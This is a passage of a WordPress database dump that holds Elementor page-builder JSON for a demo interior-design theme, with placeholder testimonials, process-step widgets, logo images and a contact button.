ground_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4215,4919,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4216,4919,'_elementor_pro_version','3.8.1'),(4217,4920,'_wp_page_template','elementor_header_footer'),(4218,4920,'_elementor_edit_mode','builder'),(4219,4920,'_elementor_template_type','wp-page'),(4220,4920,'_elementor_version','3.8.1'),(4221,4920,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom 